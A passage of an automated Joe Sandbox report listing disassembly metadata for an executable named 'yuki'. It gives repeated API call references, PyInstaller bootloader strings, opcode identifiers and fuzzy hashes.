                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                      • Instruction ID: 0d06183405194d822680c369cd5cb2bdc6c6d63257858411035f5ba319b75d7b
                                                                                                      • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                      • Instruction Fuzzy Hash: 3331B031B2A64292EE229F2298045B523E4FF68FA6F590535DD9D86BD4DF3CE444C308
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                      • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                      • Instruction ID: 01f824bfb1ee085c760528b239024e0be6ad059ae49f7081b096e167061f95a3
                                                                                                      • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                      • Instruction Fuzzy Hash: 7A416031A18A8791EA31EF30E5141E96391FF64B95F900132DA9DC3A96EF3CEA05C784
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6C81F351A,?,00000000,00007FF6C81F3F23), ref: 00007FF6C81F2AA0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                      • API String ID: 2050909247-2900015858
                                                                                                      • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                      • Instruction ID: 8a7cc37e0d70b57fbb2f9c3ab67809b2280dcef4632d55d0eac7fed7df835c47
                                                                                                      • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                      • Instruction Fuzzy Hash: 2621D132A18B8252E7308F60B9447E663A4FB987D5F400136EECC93A59DF3CD645C644
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                      • Instruction ID: 7f2bf5b3917d3c154ac46023253500a6fe9eed8d9a4da13477211c36f8c69c50
                                                                                                      • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                      • Instruction Fuzzy Hash: 5A211D34A0C28251F9789B71576E13D61925F447B3F544635E9FEC6ADADF2CA8404388
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                      • Instruction ID: 84fb3828548aabdbe0345e133bdcbab2bb9e59792ca784f243b268af310293d1
                                                                                                      • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                      • Instruction Fuzzy Hash: F7119321B18A4186E7708F62E95C32962A0FB88FF5F500234EE9DC77A4DF7DD8148788
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6C81F3FB1), ref: 00007FF6C81F8EFD
                                                                                                      • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6C81F3FB1), ref: 00007FF6C81F8F5A
                                                                                                        • Part of subcall function 00007FF6C81F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6C81F45F4,00000000,00007FF6C81F1985), ref: 00007FF6C81F93C9
                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6C81F3FB1), ref: 00007FF6C81F8FE5
                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6C81F3FB1), ref: 00007FF6C81F9044
                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6C81F3FB1), ref: 00007FF6C81F9055
                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6C81F3FB1), ref: 00007FF6C81F906A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 3462794448-0
                                                                                                      • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                      • Instruction ID: 0acf5d14f664d5bbe69948322b35402690c829ddd1a23a5b3a00bd6e76055b5d
                                                                                                      • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                      • Instruction Fuzzy Hash: 2D419D72A1968281EA30AF22A5442BA63E4FF95FD6F050135DFCD97B89DE3CE500C708
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6C8204F11,?,?,?,?,00007FF6C820A48A,?,?,?,?,00007FF6C820718F), ref: 00007FF6C820B2D7
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C8204F11,?,?,?,?,00007FF6C820A48A,?,?,?,?,00007FF6C820718F), ref: 00007FF6C820B30D
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C8204F11,?,?,?,?,00007FF6C820A48A,?,?,?,?,00007FF6C820718F), ref: 00007FF6C820B33A
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C8204F11,?,?,?,?,00007FF6C820A48A,?,?,?,?,00007FF6C820718F), ref: 00007FF6C820B34B
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C8204F11,?,?,?,?,00007FF6C820A48A,?,?,?,?,00007FF6C820718F), ref: 00007FF6C820B35C
                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF6C8204F11,?,?,?,?,00007FF6C820A48A,?,?,?,?,00007FF6C820718F), ref: 00007FF6C820B377
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                      • Instruction ID: bf164c118da5473c6b88fa238d3ac89baca2c4d22f8b6b69ca9488c86d520058
                                                                                                      • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                      • Instruction Fuzzy Hash: 76115E34B0C68292FA789F31576D13D61929F44BB2F644734E8EEC7AD6DF2CA8414388
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6C81F1B6A), ref: 00007FF6C81F295E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                      • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                      • Instruction ID: 979d44330bf3ce55b35c874c701a9736026815d715d5bf925e4768920882b088
                                                                                                      • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                      • Instruction Fuzzy Hash: E9310232B1868252E7309B71A9402E762D4BF98BE6F400136EECDC3B99EF3CD546C244
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                      • String ID: Unhandled exception in script
                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                      • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                      • Instruction ID: b892c38020d44c7f1aaaee5a4494aa334a5b847464bfc31407f7d9f3bc3dc3e5
                                                                                                      • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                      • Instruction Fuzzy Hash: DD318572619A8289EB30DF71E9592FA63A0FF88789F440135EA8E87B59DF3CD105C744
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6C81F918F,?,00007FF6C81F3C55), ref: 00007FF6C81F2BA0
                                                                                                      • MessageBoxW.USER32 ref: 00007FF6C81F2C2A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentMessageProcess
                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                      • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                      • Instruction ID: 1546ba9cafd09e18038ae376ca4f06476fcff4a9eac7be23b4df4412c076cf48
                                                                                                      • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                      • Instruction Fuzzy Hash: F721D172708B4152E7209F24F9487AA73A4FB88781F404136EE8D93A69DF3CD605C744
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6C81F1B99), ref: 00007FF6C81F2760
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                      • API String ID: 2050909247-1591803126
                                                                                                      • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                      • Instruction ID: 17bcc5f80d07c79b786017cba3c2fb566efad7470dc13d8a1dee39fa5fe1ec0f
                                                                                                      • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                      • Instruction Fuzzy Hash: 0F219F32A1878252E6209F60B9457E662A4AF98795F400135EECC93A59DF3CD545C644
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                      • Instruction ID: 6a2af6c8f22ef1a9276ffe7ae60b547dd7f4924b4115f5fea61df450498d4724
                                                                                                      • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                      • Instruction Fuzzy Hash: A7F0AF31A1860691EA308F34A59C33A6330EF49762F540239DAEE861F4CF2DE544D388
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                      • Instruction ID: a6d12744e8c0bae4d4873c382e1d07c870d51c00f3173052e2f0c4b912d7467a
                                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                      • Instruction Fuzzy Hash: 3511B622D5CA0301FA741D79E69D37D1040AF59361EF40634FAEEC62D68E6EFC456188
                                                                                                      APIs
                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF6C820A5A3,?,?,00000000,00007FF6C820A83E,?,?,?,?,?,00007FF6C820A7CA), ref: 00007FF6C820B3AF
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C820A5A3,?,?,00000000,00007FF6C820A83E,?,?,?,?,?,00007FF6C820A7CA), ref: 00007FF6C820B3CE
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C820A5A3,?,?,00000000,00007FF6C820A83E,?,?,?,?,?,00007FF6C820A7CA), ref: 00007FF6C820B3F6
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C820A5A3,?,?,00000000,00007FF6C820A83E,?,?,?,?,?,00007FF6C820A7CA), ref: 00007FF6C820B407
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C820A5A3,?,?,00000000,00007FF6C820A83E,?,?,?,?,?,00007FF6C820A7CA), ref: 00007FF6C820B418
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                      • Instruction ID: 7bd2b83df55c8d3fd9428a24aaba84fed61b80530e2ad7f15b6f01df12e160c2
                                                                                                      • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                      • Instruction Fuzzy Hash: 73113030F0868241F9789F35677D17921825F447B2F984334E9EECA6DADF2CA5414388
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                      • Instruction ID: 344b8f688bda9bf78d377af33e1c53fa0abe7e247fd4d5d0e1586f77afb4e7b3
                                                                                                      • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                      • Instruction Fuzzy Hash: AA110A34E0928785F9B8AA714B3E57D11824F45732F944736E9BECA6C6DF2CB8405289
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: verbose
                                                                                                      • API String ID: 3215553584-579935070
                                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                      • Instruction ID: 0cc9bfb641da2aaf8b65b738dd526af9e9e7df48318fa028c27591fa59910419
                                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                      • Instruction Fuzzy Hash: F091C032A0878685F7308E74D668B7E7691AB40B96F844132DADD873D6DF3CE8058388
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
